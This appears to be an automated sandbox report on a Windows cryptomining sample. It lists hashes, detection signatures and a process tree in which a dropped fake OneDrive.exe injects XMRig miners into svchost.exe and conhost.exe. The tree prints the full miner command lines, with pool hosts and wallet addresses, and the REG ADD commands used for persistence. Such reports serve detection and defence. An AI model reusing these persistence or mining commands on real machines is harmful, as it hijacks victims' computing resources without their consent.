Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2024 13:37
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
Resource
win7-20240903-en
windows7-x64
9 signatures
150 seconds
Behavioral task
behavioral2
Sample
JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
17 signatures
150 seconds
General
-
Target
JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe
-
Size
796KB
-
MD5
6eeac2d35e80994362ed079c11db5c81
-
SHA1
04008758fbc4a294fc8351a6fa1b10870d97afc9
-
SHA256
e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9
-
SHA512
e372b6b7b24d409fc93cc257889c85e4cf72e1340d98ac24b64ad983c8d63929ea7d55b4cfbd9300523a198f18caf08746556bcfbc853bef1a1da2f609e3f379
-
SSDEEP
24576:4G0N+xjC15Vdj4E/gA2AUOfrFQpbswwwwwYs82ugb3tdvE:d0N+xjC1Ddj4E/rHFQpbswwwwwYszuyI
Score
10/10
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral2/memory/3356-44-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/3356-45-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/3356-47-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/3356-50-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/3356-49-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/3356-51-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/3356-48-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe -
Executes dropped EXE 1 IoCs
pid Process 224 OneDrive.exe -
Loads dropped DLL 1 IoCs
pid Process 224 OneDrive.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" REG.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 224 set thread context of 1996 224 OneDrive.exe 87 PID 224 set thread context of 3356 224 OneDrive.exe 94 -
resource yara_rule behavioral2/memory/1996-42-0x0000000140000000-0x0000000142B59000-memory.dmp upx behavioral2/memory/1996-43-0x0000000140000000-0x0000000142B59000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1088 REG.exe 2916 REG.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe 224 OneDrive.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 3356 conhost.exe Token: SeLockMemoryPrivilege 3356 conhost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3356 conhost.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2244 wrote to memory of 224 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 82 PID 2244 wrote to memory of 224 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 82 PID 2244 wrote to memory of 1088 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 83 PID 2244 wrote to memory of 1088 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 83 PID 2244 wrote to memory of 1088 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 83 PID 2244 wrote to memory of 2916 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 84 PID 2244 wrote to memory of 2916 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 84 PID 2244 wrote to memory of 2916 2244 JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe 84 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 1996 224 OneDrive.exe 87 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94 PID 224 wrote to memory of 3356 224 OneDrive.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_e3b965382ed72035e4d46cf53f44dd3f2146ec96cd0838ecb8576cc404293cc9.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe --algo TON --pool wss://pplns.toncoinpool.io/stratum --user EQAWGzcmciTEXnXdAxgH2GiJGMGMG0MVICewpEaRsmtq5ARO.EasyMiner3⤵PID:1996
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe -o xmr.2miners.com:2222 -u 492JEFQduhwhefpsGy7GWe5rhJo977ePh9xEMpfbmSs8YyjbTKuFcXTQyBoEdQeZdwaUigNXhascMKr6DDQkhNspBCjRG4R -p "EasyMiner"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3356
-
-
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1088
-
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 0200000000000000000000002⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2916
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
238B
MD5e12f93fc9f23ce507bd15a331b736823
SHA1a08bfe34dd0be13b43f835cb4ff4570fec1a27e2
SHA256bf9281b20d4502ee35f7ef0a8f3b88b5d52c4ff1965be227f5b37490eade23d5
SHA512d727f6ad035941630234f5d18d2b05eb0fec55ee3f745021504bed23277e644dc2e1f6bc03fd734b27ac9469e1f440767dc0712b603af2885823aa2b0999045c
-
Filesize
175KB
MD5f3af73070387fb75b19286826cc3126c
SHA17774854137d7ada89f3b4bdf67631456a1e74853
SHA256974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610
SHA512a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a
-
Filesize
316KB
MD5fed6517a5f84eecc29edee5586d7feeb
SHA156df244bf73c7ec7b59c98e1f5d47b379b58a06b
SHA2565075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6
SHA51245cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642